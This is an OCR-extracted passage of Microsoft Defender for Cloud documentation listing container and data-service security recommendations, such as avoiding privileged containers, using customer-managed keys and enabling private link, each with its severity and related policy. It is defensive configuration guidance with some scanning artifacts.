information, see https://aka.ms/kubepolicydoc E, 
(Related policy: Kubernetes clusters should disable 
automounting API credentials Z) 


To reduce the attack surface of your containers, restrict 
CAP_SYS_ADMIN Linux capabilities. For more information, 
see https://aka.ms/kubepolicydoc E, 

(No related policy) 


Prevent usage of the default namespace in Kubernetes 
clusters to protect against unauthorized access for 
ConfigMap, Pod, Secret, Service, and ServiceAccount 
resource types. For more information, see 
https://aka.ms/kubepolicydoc £ . 

(Related policy: Kubernetes clusters should not use the 
default namespace £) 


To reduce attack surface of your container, restrict Linux 
capabilities and grant specific privileges to containers 
without granting all the privileges of the root user. We 
recommend dropping all capabilities, then adding those 
that are required 

(Related policy: Kubernetes cluster containers should only 
use allowed capabilities Z) 


Microsoft Defender for Containers provides hardening, 
vulnerability assessment and run-time protections for your 
Azure, hybrid, and multi-cloud Kubernetes environments. 
You can use this information to quickly remediate security 
issues and improve the security of your containers. 


Important: Remediating this recommendation will result in 
charges for protecting your Kubernetes clusters. If you 
don't have any Kubernetes clusters in this subscription, no 
charges will be incurred. 

If you create any Kubernetes clusters on this subscription 
in the future, they will automatically be protected and 
charges will begin at that time. 

Learn more in Introduction to Microsoft Defender for 


Severity 


High 


High 


Low 


Medium 


High 


Recommendation 


Privileged containers 
should be avoided Z 


Role-Based Access 
Control should be used 


on Kubernetes Services E 


Running containers as 
root user should be 
avoided 7 


Running container 
images should have 
vulnerability findings 
resolved (powered by 
Qualys) Z 


Running container 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 
Management) Si 


Services should listen on 


allowed ports only £ 


Description 


Containers. 
(No related policy) 


To prevent unrestricted host access, avoid privileged 
containers whenever possible. 

Privileged containers have all of the root capabilities of a 
host machine. They can be used as entry points for attacks 
and to spread malicious code or malware to compromised 
applications, hosts and networks. 


(Related policy: Do not allow privileged containers in 
Kubernetes cluster £) 


To provide granular filtering on the actions that users can 
perform, use Role-Based Access Control (RBAC) to manage 
permissions in Kubernetes Service Clusters and configure 
relevant authorization policies. For more information, see 
Azure role-based access control. 

(Related policy: Role-Based Access Control (RBAC) should 
be used on Kubernetes Services E) 


Containers shouldn't run as root users in your Kubernetes 
cluster. Running a process as the root user inside a 
container runs it as root on the host. If there's a 
compromise, an attacker has root in the container, and any 
misconfigurations become easier to exploit. 

(Related policy: Kubernetes cluster pods and containers 
should only run with approved user and group IDs £) 


Container image vulnerability assessment scans container 
images running on your Kubernetes clusters for security 
vulnerabilities and exposes detailed findings for each 
image. Resolving the vulnerabilities can greatly improve 
your containers’ security posture and protect them from 
attacks. 

(No related policy) 


Container image vulnerability assessment scans your 
registry for commonly known vulnerabilities (CVEs) and 
provides a detailed vulnerability report for each image. 
This recommendation provides visibility to vulnerable 
images currently running in your Kubernetes clusters. 
Remediating vulnerabilities in container images that are 
currently running is key to improving your security 
posture, significantly reducing the attack surface for your 
containerized workloads. 


To reduce the attack surface of your Kubernetes cluster, 
restrict access to the cluster by limiting services access to 


Severity 


Medium 


High 


High 


High 


High 


Medium 


Recommendation Er GEA Severity 
(Related_policy: Ensure services listen only on allowed 


ports in Kubernetes cluster Z) 


Usage of host Restrict pod access to the host network and the allowable Medium 
networking and ports host port range in a Kubernetes cluster. Pods created with 
should be restricted Z the hostNetwork attribute enabled will share the node's 


network space. To avoid compromised container from 
sniffing network traffic, we recommend not putting your 
pods on the host network. If you need to expose a 
container port on the node's network, and using a 
Kubernetes Service node port does not meet your needs, 
another possibility is to specify a hostPort for the container 
in the pod spec. 

(Related policy: Kubernetes cluster pods should only use 
approved host network and port range £) 


Usage of pod HostPath We recommend limiting pod HostPath volume mounts in Medium 
volume mounts should your Kubernetes cluster to the configured allowed host 

be restricted toa known paths. If there's a compromise, the container node access 

list to restrict node from the containers should be restricted. 

access from (Related policy: Kubernetes cluster pod hostPath volumes 


compromised containers £ should only use allowed host paths £ ) 


Data recommendations 


There are 78 recommendations in this category. 


Recommendation Description Severity 
[Enable if required] Recommendations to use customer-managed keys for Low 
Azure Cosmos DB encryption of data at rest are not assessed by default, but are 


accounts should use available to enable for applicable scenarios. Data is encrypted 

customer-managed automatically using platform-managed keys, so the use of 

keys to encrypt data customer-managed keys should only be applied when 

at rest Z obligated by compliance or restrictive policy requirements. 
To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 
Use customer-managed keys to manage the encryption at rest 
of your Azure Cosmos DB. By default, the data is encrypted at 
rest with service-managed keys, but customer-managed keys 
(CMK) are commonly required to meet regulatory compliance 
standards. CMKs enable the data to be encrypted with an 
Azure Key Vault key created and owned by you. You have full 


Recommendation 


[Enable if required] 
Azure Machine 
Learning workspaces 
should be encrypted 
with a customer- 


managed key (CMK) Z 


[Enable if required] 
Cognitive Services 
accounts should 
enable data 
encryption with a 
customer-managed 
key (CMK) Z 


Description 


control and responsibility for the key lifecycle, including 
rotation and management. Learn more about CMK encryption 
at https://aka.ms/cosmosdb-cmk Z. 

(Related policy: Azure Cosmos DB accounts should use 
customer-managed keys to encrypt data at rest “) 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but are 
available to enable for applicable scenarios. Data is encrypted 
automatically using platform-managed keys, so the use of 
customer-managed keys should only be applied when 
obligated by compliance or restrictive policy requirements. 
To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 

Manage encryption at rest of your Azure Machine Learning 
workspace data with customer-managed keys (CMK). By 
default, customer data is encrypted with service-managed 
keys, but CMKs are commonly required to meet regulatory 
compliance standards. CMKs enable the data to be encrypted 
with an Azure Key Vault key created and owned by you. You 
have full control and responsibility for the key lifecycle, 
including rotation and management. Learn more about CMK 
encryption at https://aka.ms/azureml-workspaces-cmk E, 
(Related policy: Azure Machine Learning workspaces should be 
encrypted with a customer-managed key (CMK) £) 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but are 
available to enable for applicable scenarios. Data is encrypted 
automatically using platform-managed keys, so the use of 
customer-managed keys should only be applied when 
obligated by compliance or restrictive policy requirements. 

To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 

Customer-managed keys (CMK) are commonly required to 
meet regulatory compliance standards. CMKs enable the data 
stored in Cognitive Services to be encrypted with an Azure Key 
Vault key created and owned by you. You have full control and 
responsibility for the key lifecycle, including rotation and 
management. Learn more about CMK encryption at 
https://aka.ms/cosmosdb-cmk Z. 


Severity 


Low 


Low 


Recommendation 


[Enable if required] 
MySQL servers 
should use 
customer-managed 
keys to encrypt data 
at rest £ 


[Enable if required] 
PostgreSQL servers 
should use 
customer-managed 
keys to encrypt data 
at rest 2 


Description 


(Related policy: Cognitive Services accounts should enable 
data encryption with a customer-managed key?(CMK) £ ) 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but are 
available to enable for applicable scenarios. Data is encrypted 
automatically using platform-managed keys, so the use of 
customer-managed keys should only be applied when 
obligated by compliance or restrictive policy requirements. 

To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 

Use customer-managed keys to manage the encryption at rest 
of your MySQL servers. By default, the data is encrypted at rest 
with service-managed keys, but customer-managed keys 
(CMK) are commonly required to meet regulatory compliance 
standards. CMKs enable the data to be encrypted with an 
Azure Key Vault key created and owned by you. You have full 
control and responsibility for the key lifecycle, including 
rotation and management. 

(Related policy: Bring your own key data protection should be 
enabled for MySQL servers £) 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but are 
available to enable for applicable scenarios. Data is encrypted 
automatically using platform-managed keys, so the use of 
customer-managed keys should only be applied when 
obligated by compliance or restrictive policy requirements. 

To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 

Use customer-managed keys to manage the encryption at rest 
of your PostgreSQL servers. By default, the data is encrypted at 
rest with service-managed keys, but customer-managed keys 
(CMK) are commonly required to meet regulatory compliance 
standards. CMKs enable the data to be encrypted with an 
Azure Key Vault key created and owned by you. You have full 
control and responsibility for the key lifecycle, including 
rotation and management. 

(Related policy: Bring your own key data protection should be 
enabled for PostgreSQL servers £ ) 


Severity 


Low 


Low 


Recommendation 


[Enable if required] 
SQL managed 
instances should use 
customer-managed 
keys to encrypt data 
at rest? 


[Enable if required] 
SQL servers should 
use customer- 
managed keys to 
encrypt data at rest Z 


[Enable if required] 
Storage accounts 
should use 
customer-managed 
key (CMK) for 
encryption E 


Description 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but are 
available to enable for applicable scenarios. Data is encrypted 
automatically using platform-managed keys, so the use of 
customer-managed keys should only be applied when 
obligated by compliance or restrictive policy requirements. 

To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 

Implementing Transparent Data Encryption (TDE) with your 
own key provides you with increased transparency and control 
over the TDE Protector, increased security with an HSM- 


backed external service, and promotion of separation of duties. 


This recommendation applies to organizations with a related 
compliance requirement. 

(Related policy: SQL managed instances should use customer- 
managed keys to encrypt data at rest £) 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but are 
available to enable for applicable scenarios. Data is encrypted 
automatically using platform-managed keys, so the use of 
customer-managed keys should only be applied when 
obligated by compliance or restrictive policy requirements. 

To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 
parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 

Implementing Transparent Data Encryption (TDE) with your 
own key provides increased transparency and control over the 
TDE Protector, increased security with an HSM-backed external 
service, and promotion of separation of duties. This 
recommendation applies to organizations with a related 
compliance requirement. 

(Related policy: SQL servers should use customer-managed 
keys to encrypt data at rest £) 


Recommendations to use customer-managed keys for 
encryption of data at rest are not assessed by default, but are 
available to enable for applicable scenarios. Data is encrypted 
automatically using platform-managed keys, so the use of 
customer-managed keys should only be applied when 
obligated by compliance or restrictive policy requirements. 
To enable this recommendation, navigate to your Security 
Policy for the applicable scope, and update the Effect 


Severity 


Low 


Low 


Low 


Recommendation 


All advanced threat 
protection types 
should be enabled in 
SQL managed 

instance advanced 
data security settings E 


All advanced threat 
protection types 
should be enabled in 
SQL server advanced 
data security settings E 


API Management 
services should use a 
virtual network Z 


App Configuration 
should use private 
link 2 


Audit retention for 
SQL servers should 


Description 


parameter for the corresponding policy to audit or enforce the 
use of customer-managed keys. Learn more in Manage 
security policies. 

Secure your storage account with greater flexibility using 
customer-managed keys (CMKs). When you specify a CMK, 
that key is used to protect and control access to the key that 
encrypts your data. Using CMKs provides additional 
capabilities to control rotation of the key encryption key or 
cryptographically erase data. 

(Related policy: Storage accounts should use customer- 
managed key (CMK) for encryption © ) 


It is recommended to enable all advanced threat protection 
types on your SQL managed instances. Enabling all types 
protects against SQL injection, database vulnerabilities, and 
any other anomalous activities. 

(No related policy) 


It is recommended to enable all advanced threat protection 
types on your SQL servers. Enabling all types protects against 
SQL injection, database vulnerabilities, and any other 
anomalous activities. 

(No related policy) 


Azure Virtual Network deployment provides enhanced 
security, isolation and allows you to place your API 
Management service in a non-internet routable network that 
you control access to. These networks can then be connected 
to your on-premises networks using various VPN technologies, 
which enables access to your backend services within the 
network and/or on-premises. The developer portal and API 
gateway, can be configured to be accessible either from the 
Internet or only within the virtual network. 

(Related policy: API Management services should use a virtual 
network 7) 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The private link platform handles the connectivity 
between the consumer and services over the Azure backbone 
network. By mapping private endpoints to your app 
configuration instances instead of the entire service, you'll also 
be protected against data leakage risks. Learn more at: 
https://aka.ms/appconfig/private-endpoint £ . 

(Related policy: App Configuration should use private link £) 


Audit SQL servers configured with an auditing retention period 
of less than 90 days. 


Severity 


Medium 


Medium 


Medium 


Medium 


Low 


Recommendation 


be set to at least 90 
days E 


Auditing on SQL 
server should be 
enabled Z 


Auto provisioning of 
the Log Analytics 
agent should be 
enabled on 
subscriptions Z 


Azure Cache for 
Redis should reside 
within a virtual 
network E 


Azure Database for 
MySQL should have 
an Azure Active 
Directory 
administrator 
provisioned £ 


Azure Database for 
PostgreSQL should 
have an Azure Active 
Directory 
administrator 
provisioned č 


Azure Cosmos DB 
accounts should 
have firewall rules 7 


Description 


(Related policy: SQL servers should be configured with 90 days 
auditing retention or higher. £ ) 


Enable auditing on your SQL Server to track database activities 
across all databases on the server and save them in an audit 
log. 

(Related policy: Auditing on SQL server should be enabled £ ) 


To monitor for security vulnerabilities and threats, Microsoft 
Defender for Cloud collects data from your Azure virtual 
machines. Data is collected by the Log Analytics agent, 
formerly known as the Microsoft Monitoring Agent (MMA), 
which reads various security-related configurations and event 
logs from the machine and copies the data to your Log 
Analytics workspace for analysis. We recommend enabling 
auto provisioning to automatically deploy the agent to all 
supported Azure VMs and any new ones that are created. 
(Related policy: Auto provisioning of the Log Analytics agent 
should be enabled on your subscription £) 


Azure Virtual Network (VNet) deployment provides enhanced 
security and isolation for your Azure Cache for Redis, as well as 
subnets, access control policies, and other features to further 
restrict access. When an Azure Cache for Redis instance is 
configured with a VNet, it is not publicly addressable and can 
only be accessed from virtual machines and applications within 
the VNet. 

(Related policy: Azure Cache for Redis should reside within a 
virtual network ©) 


Provision an Azure AD administrator for your Azure Database 
for MySQL to enable Azure AD authentication. Azure AD 
authentication enables simplified permission management and 
centralized identity management of database users and other 
Microsoft services 

(Related policy: An Azure Active Directory administrator should 
be provisioned for MySQL servers E ) 


Provision an Azure AD administrator for your Azure Database 
for PostgreSQL to enable Azure AD authentication. Azure AD 
authentication enables simplified permission management and 
centralized identity management of database users and other 
Microsoft services 

(Related policy: An Azure Active Directory administrator should 
be provisioned for PostgreSQL servers £ ) 


Firewall rules should be defined on your Azure Cosmos DB 
accounts to prevent traffic from unauthorized sources. 
Accounts that have at least one IP rule defined with the virtual 


Severity 


Low 


Low 


Medium 


Medium 


Medium 


Medium 


Recommendation 


Azure Event Grid 
domains should use 
private link 


Azure Event Grid 
topics should use 
private link Z 


Azure Machine 
Learning workspaces 
should use private 
link £ 


Azure SignalR 
Service should use 
private link Z 


MESO enabled are deemed compliant. Accounts 
disabling public access are also deemed compliant. 
(Related policy: Azure Cosmos DB accounts should have 
firewall rules Z) 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The private link platform handles the connectivity 
between the consumer and services over the Azure backbone 
network. By mapping private endpoints to your Event Grid 
domains instead of the entire service, you'll also be protected 
against data leakage risks. Learn more at: 
https://aka.ms/privateendpoints E, 

(Related policy: Azure Event Grid domains should use private 
link 2) 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The private link platform handles the connectivity 
between the consumer and services over the Azure backbone 
network. By mapping private endpoints to your topics instead 
of the entire service, you'll also be protected against data 
leakage risks. Learn more at: 

https://aka.ms/privateendpoints E, 

(Related policy: Azure Event Grid topics should use private 
link 2) 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The private link platform handles the connectivity 
between the consumer and services over the Azure backbone 
network. By mapping private endpoints to your Azure Machine 
Learning workspaces instead of the entire service, you'll also 
be protected against data leakage risks. Learn more at: 
https://aka.ms/azureml-workspaces-privatelink  . 

(Related policy: Azure Machine Learning workspaces should 
use private link £ ) 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The private link platform handles the connectivity 
between the consumer and services over the Azure backbone 
network. By mapping private endpoints to your SignalR 
resources instead of the entire service, you'll also be protected 
against data leakage risks. Learn more at: 
https://aka.ms/asrs/privatelink Z . 

(Related policy: Azure SignalR Service should use private 

link 2) 


Severity 


Medium 


Medium 


Medium 


Medium 


Recommendation 


Azure Spring Cloud 
should use network 
injection E 


Azure SQL Managed 
Instance 
authentication mode 
should be Azure 
Active Directory Only z 


Azure Synapse 
Workspace 
authentication mode 
should be Azure 

Active Directory Only ¢ 


Code repositories 
should have code 
scanning findings 
resolved Z 


Code repositories 
should have 
Dependabot 
scanning findings 
resolved Z 


Code repositories 
should have 
infrastructure as 
code scanning 
findings resolved 7 


Code repositories 
should have secret 
scanning findings 
resolved 7 


Description 


Azure Spring Cloud instances should use virtual network 
injection for the following purposes: 1. Isolate Azure Spring 
Cloud from Internet. 2. Enable Azure Spring Cloud to interact 
with systems in either on premises data centers or Azure 
service in other virtual networks. 3. Empower customers to 
control inbound and outbound network communications for 
Azure Spring Cloud. 

(Related policy: Azure Spring Cloud should use network 
injection £ ) 


Disabling local authentication methods and allowing only 
Azure Active Directory Authentication improves security by 
ensuring that Azure SQL Managed Instances can exclusively be 
accessed by Azure Active Directory identities. 

(Related policy: Azure SQL Managed Instance should have 
Azure Active Directory Only Authentication enabled £) 


Azure Synapse Workspace authentication mode should be 
Azure Active Directory Only 

Azure Active Directory only authentication methods improves 
security by ensuring that Synapse Workspaces exclusively 
require Azure AD identities for authentication. Learn more”. 
(Related policy: Synapse Workspaces should use only Azure 
Active Directory identities for authentication £) 


Defender for DevOps has found vulnerabilities in code 
repositories. To improve the security posture of the 
repositories, it is highly recommended to remediate these 
vulnerabilities. 

(No related policy) 


Defender for DevOps has found vulnerabilities in code 
repositories. To improve the security posture of the 
repositories, it is highly recommended to remediate these 
vulnerabilities. 

(No related policy) 


Defender for DevOps has found infrastructure as code security 
configuration issues in repositories. The issues shown below 
have been detected in template files. To improve the security 
posture of the related cloud resources, it is highly 
recommended to remediate these issues. 

(No related policy) 


Defender for DevOps has found a secret in code repositories. 
This should be remediated immediately to prevent a security 
breach. Secrets found in repositories can be leaked or 
discovered by adversaries, leading to compromise of an 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Medium 


High 


Recommendation 


Cognitive Services 
accounts should 
enable data 
encryption E 


Cognitive Services 
accounts should 
restrict network 
access E 


Cognitive Services 
accounts should use 
customer owned 
storage or enable 
data encryption E 


Diagnostic logs in 
Azure Data Lake 
Store should be 
enabled £ 


Diagnostic logs in 
Data Lake Analytics 
should be enabled Z 


Email notification for 
high severity alerts 
should be enabled Z 


Description 


application or service. For Azure DevOps, the Microsoft 
Security DevOps CredScan tool only scans builds on which it 
has been configured to run. Therefore, results may not reflect 
the complete status of secrets in your repositories. 

(No related policy) 


This policy audits any Cognitive Services account not using 
data encryption. For each Cognitive Services account with 
storage, should enable data encryption with either customer 
managed or Microsoft managed key. 

(Related policy: Cognitive Services accounts should enable 
data encryption £ ) 


Network access to Cognitive Services accounts should be 
restricted. Configure network rules so only applications from 
allowed networks can access the Cognitive Services account. 
To allow connections from specific internet or on-premises 
clients, access can be granted to traffic from specific Azure 
virtual networks or to public internet IP address ranges. 
(Related policy: Cognitive Services accounts should restrict 
network access Z) 


This policy audits any Cognitive Services account not using 
customer owned storage nor data encryption. For each 
Cognitive Services account with storage, use either customer 
owned storage or enable data encryption. 

(Related policy: Cognitive Services accounts should use 
customer owned storage or enable data encryption. £) 


Enable logs and retain them for up to a year. This enables you 
to recreate activity trails for investigation purposes when a 
security incident occurs or your network is compromised. 
(Related policy: Diagnostic logs in Azure Data Lake Store 
should be enabled £) 


Enable logs and retain them for up to a year. This enables you 
to recreate activity trails for investigation purposes when a 
security incident occurs or your network is compromised. 
(Related policy: Diagnostic logs in Data Lake Analytics should 
be enabled £ ) 


To ensure the relevant people in your organization are notified 
when there is a potential security breach in one of your 
subscriptions, enable email notifications for high severity alerts 
in Defender for Cloud. 

(Related policy: Email notification for high severity alerts 
should be enabled 2) 


Severity 


Low 


Medium 


Low 


Low 


Low 


Low 


Recommendation 


Email notification to 
subscription owner 
for high severity 
alerts should be 
enabled Z 


Enforce SSL 
connection should 
be enabled for 
MySQL database 
servers E 


Enforce SSL 
connection should 
be enabled for 
PostgreSQL database 
servers E 


Function apps 
should have 
vulnerability findings 
resolved Z 


Geo-redundant 
backup should be 
enabled for Azure 
Database for 
MariaDB Z 


Description 


To ensure your subscription owners are notified when there is 
a potential security breach in their subscription, set email 
notifications to subscription owners for high severity alerts in 
Defender for Cloud. 

(Related policy: Email notification to subscription owner for 
high severity alerts should be enabled  ) 


Azure Database for MySQL supports connecting your Azure 
Database for MySQL server to client applications using Secure 
Sockets Layer (SSL). 

Enforcing SSL connections between your database server and 
your client applications helps protect against 'man in the 
middle' attacks by encrypting the data stream between the 
server and your application. 

This configuration enforces that SSL is always enabled for 
accessing your database server. 

(Related policy: Enforce SSL connection should be enabled for 
MySQL database servers Z) 


Azure Database for PostgreSQL supports connecting your 
Azure Database for PostgreSQL server to client applications 
using Secure Sockets Layer (SSL). 

Enforcing SSL connections between your database server and 
your client applications helps protect against 'man in the 
middle' attacks by encrypting the data stream between the 
server and your application. 

This configuration enforces that SSL is always enabled for 
accessing your database server. 

(Related policy: Enforce SSL connection should be enabled for 
PostgreSQL database servers £ ) 


Runtime vulnerability scanning for functions scans your High 
function apps for security vulnerabilities and exposes detailed 
findings. Resolving the vulnerabilities can greatly improve your 
serverless applications security posture and protect them from 
attacks. 


(No related policy) 


Azure Database for MariaDB allows you to choose the Low 
redundancy option for your database server. 

It can be set to a geo-redundant backup storage in which the 

data is not only stored within the region in which your server is 
hosted, but is also replicated to a paired region to provide 

recovery options in case of a region failure. 

Configuring geo-redundant storage for backup is only allowed 

when creating a server. 

(Related policy: Geo-redundant backup should be enabled for 


Azure Database for MariaDB Z ) 


Severity 


Medium 


Medium 


Medium 


Recommendation 


Geo-redundant 
backup should be 
enabled for Azure 


Database for MySQL Z 


Geo-redundant 
backup should be 
enabled for Azure 
Database for 
PostgreSQL z 


GitHub repositories 
should have Code 
scanning enabled Z 


GitHub repositories 
should have 
Dependabot 
scanning enabled Z 


GitHub repositories 
should have Secret 


Description 


Azure Database for MySQL allows you to choose the 
redundancy option for your database server. 

It can be set to a geo-redundant backup storage in which the 
data is not only stored within the region in which your server is 
hosted, but is also replicated to a paired region to provide 
recovery options in case of a region failure. 

Configuring geo-redundant storage for backup is only allowed 
when creating a server. 

(Related policy: Geo-redundant backup should be enabled for 
Azure Database for MySQL“) 


Azure Database for PostgreSQL allows you to choose the 
redundancy option for your database server. 

It can be set to a geo-redundant backup storage in which the 
data is not only stored within the region in which your server is 
hosted, but is also replicated to a paired region to provide 
recovery options in case of a region failure. 

Configuring geo-redundant storage for backup is only allowed 
when creating a server. 

(Related policy: Geo-redundant backup should be enabled for 
Azure Database for PostgreSQL SZ 


GitHub uses code scanning to analyze code in order to find 
security vulnerabilities and errors in code. Code scanning can 
be used to find, triage, and prioritize fixes for existing 
problems in your code. Code scanning can also prevent 
developers from introducing new problems. Scans can be 
scheduled for specific days and times, or scans can be 
triggered when a specific event occurs in the repository, such 
as a push. If code scanning finds a potential vulnerability or 
error in code, GitHub displays an alert in the repository. A 
vulnerability is a problem in a project's code that could be 
exploited to damage the confidentiality, integrity, or 
availability of the project. 

(No related policy) 


GitHub sends Dependabot alerts when it detects vulnerabilities 
in code dependencies that affect repositories. A vulnerability is 
a problem in a project's code that could be exploited to 
damage the confidentiality, integrity, or availability of the 
project or other projects that use its code. Vulnerabilities vary 
in type, severity, and method of attack. When code depends 
on a package that has a security vulnerability, this vulnerable 
dependency can cause a range of problems. 

(No related policy) 


GitHub scans repositories for known types of secrets, to 
prevent fraudulent use of secrets that were accidentally 


Severity 


Low 


Low 


Medium 


Medium 


High 


Recommendation Description Severity 


scanning enabled Z committed to repositories. Secret scanning will scan the entire 
Git history on all branches present in the GitHub repository for 
any secrets. Examples of secrets are tokens and private keys 
that a service provider can issue for authentication. If a secret 
is checked into a repository, anyone who has read access to 
the repository can use the secret to access the external service 
with those privileges. Secrets should be stored in a dedicated, 
secure location outside the repository for the project. 
(No related policy) 


Microsoft Defender Microsoft Defender for SQL is a unified package that provides High 

for Azure SQL advanced SQL security capabilities. 

Database servers It includes functionality for surfacing and mitigating potential 

should be enabled % database vulnerabilities, detecting anomalous activities that 
could indicate a threat to your database, and discovering and 
classifying sensitive data. 
Important: Protections from this plan are charged as shown on 
the Defender plans page. If you don't have any Azure SQL 
Database servers in this subscription, you won't be charged. If 
you later create Azure SQL Database servers on this 
subscription, they'll automatically be protected and charges 
will begin. Learn about the pricing details per region”. 
Learn more in Introduction to Microsoft Defender for SQL. 
(Related policy: Azure Defender for Azure SQL Database 
servers should be enabled £) 


Microsoft Defender Microsoft Defender for DNS provides an additional layer of High 
for DNS should be protection for your cloud resources by continuously 
enabled Z monitoring all DNS queries from your Azure resources. 


Defender for DNS alerts you about suspicious activity at the 
DNS layer. Learn more in Introduction to Microsoft Defender 
for DNS. Enabling this Defender plan results in charges. Learn 
about the pricing details per region on Defender for Cloud's 
pricing page: https://azure.microsoft.com/services/defender- 
for-cloud/#pricing E, 

(No related policy) 


Microsoft Defender Microsoft Defender for open-source relational databases High 

for open-source detects anomalous activities indicating unusual and potentially 

relational databases harmful attempts to access or exploit databases. Learn more in 

should be enabled? Introduction to Microsoft Defender for open-source relational 
databases. 


Important: Enabling this plan will result in charges for 
protecting your open-source relational databases. If you don't 
have any open-source relational databases in this subscription, 
no charges will be incurred. If you create any open-source 
relational databases on this subscription in the future, they will 


Recommendation 


Microsoft Defender 
for Resource 
Manager should be 
enabled £ 


Microsoft Defender 
for SQL on machines 
should be enabled 
on workspaces E 


Microsoft Defender 
for SQL servers on 
machines should be 
enabled Z 


Description 


automatically be protected and charges will begin at that time. 
(No related policy) 


Microsoft Defender for Resource Manager automatically 
monitors the resource management operations in your 
organization. Defender for Cloud detects threats and alerts 
you about suspicious activity. Learn more in Introduction to 
Microsoft Defender for Resource Manager. Enabling this 
Defender plan results in charges. Learn about the pricing 
details per region on Defender for Cloud's pricing page: 
https://azure.microsoft.com/services/defender-for- 
cloud/#pricing E, 

(No related policy) 


Microsoft Defender for servers brings threat detection and 
advanced defenses for your Windows and Linux machines. 
With this Defender plan enabled on your subscriptions but not 
on your workspaces, you're paying for the full capability of 
Microsoft Defender for servers but missing out on some of the 
benefits. 

When you enable Microsoft Defender for servers on a 
workspace, all machines reporting to that workspace will be 
billed for Microsoft Defender for servers - even if they're in 
subscriptions without Defender plans enabled. Unless you also 
enable Microsoft Defender for servers on the subscription, 
those machines won't be able to take advantage of just-in- 
time VM access, adaptive application controls, and network 
detections for Azure resources. 

Learn more in Introduction to Microsoft Defender for servers. 
(No related policy) 


Microsoft Defender for SQL is a unified package that provides 
advanced SQL security capabilities. 

It includes functionality for surfacing and mitigating potential 
database vulnerabilities, detecting anomalous activities that 
could indicate a threat to your database, and discovering and 
classifying sensitive data. 


Important: Remediating this recommendation will result in 
charges for protecting your SQL servers on machines. If you 
don't have any SQL servers on machines in this subscription, 
no charges will be incurred. 

If you create any SQL servers on machines on this subscription 
in the future, they will automatically be protected and charges 
will begin at that time. 

Learn more about Microsoft Defender for SQL servers on 
machines. 


Severity 


High 


Medium 


High 


Recommendation 


Microsoft Defender 
for SQL should be 
enabled for 
unprotected Azure 
SQL servers E 


Microsoft Defender 
for SQL should be 
enabled for 
unprotected SQL 
Managed Instances E 


Microsoft Defender 
for Storage should 
be enabled Z 


Network Watcher 
should be enabled Z 


Over-provisioned 
identities in 
subscriptions should 
be investigated to 
reduce the 


Description 


(Related policy: Azure Defender for SQL servers on machines 
should be enabled Z) 


Microsoft Defender for SQL is a unified package that provides 
advanced SQL security capabilities. It surfaces and mitigates 
potential database vulnerabilities, and detects anomalous 
activities that could indicate a threat to your database. 
Microsoft Defender for SQL is billed as shown on pricing 
details per region. 

(Related policy: Advanced data security should be enabled on 
your SQL servers E) 


Microsoft Defender for SQL is a unified package that provides 
advanced SQL security capabilities. It surfaces and mitigates 
potential database vulnerabilities, and detects anomalous 
activities that could indicate a threat to your database. 
Microsoft Defender for SQL is billed as shown on pricing 
details per region. 

(Related policy: Advanced data security should be enabled on 
SQL Managed Instance £ ) 


Microsoft Defender for storage detects unusual and potentially 
harmful attempts to access or exploit storage accounts. 
Important: Protections from this plan are charged as shown on 
the Defender plans page. If you don't have any Azure Storage 
accounts in this subscription, you won't be charged. If you 

later create Azure Storage accounts on this subscription, they'll 
automatically be protected and charges will begin. Learn about 
the pricing details per region Z. 

Learn more in Introduction to Microsoft Defender for Storage. 
(Related policy: Azure Defender for Storage should be 

enabled Z) 


Network Watcher is a regional service that enables you to 
monitor and diagnose conditions at a network scenario level 
in, to, and from Azure. Scenario level monitoring enables you 
to diagnose problems at an end-to-end network level view. 
Network diagnostic and visualization tools available with 
Network Watcher help you understand, diagnose, and gain 
insights to your network in Azure. 

(Related policy: Network Watcher should be enabled ©) 


Over-provisioned identities in subscription should be 
investigated to reduce the Permission Creep Index (PCI) and to 
safeguard your infrastructure. Reduce the PCI by removing the 
unused high risk permission assignments. High PCI reflects risk 
associated with the identities with permissions that exceed 


Severity 


High 


High 


High 


Low 


Medium 


Recommendation 


Permission Creep 
Index (PCI) Z 


Private endpoint 
connections on 
Azure SQL Database 
should be enabled 7 


Private endpoint 
should be enabled 
for MariaDB servers E 


Private endpoint 
should be enabled 
for MySQL servers E 


Private endpoint 
should be enabled 
for PostgreSQL 
servers č 


Public network 
access on Azure SQL 
Database should be 
disabled Z 


Public network 
access should be 
disabled for 
Cognitive Services 
accounts E 


Description 


their normal or required usage 
(No related policy) 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure SQL Database. 
(Related policy: Private endpoint connections on Azure SQL 
Database should be enabled £ ) 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure Database for 
MariaDB. 

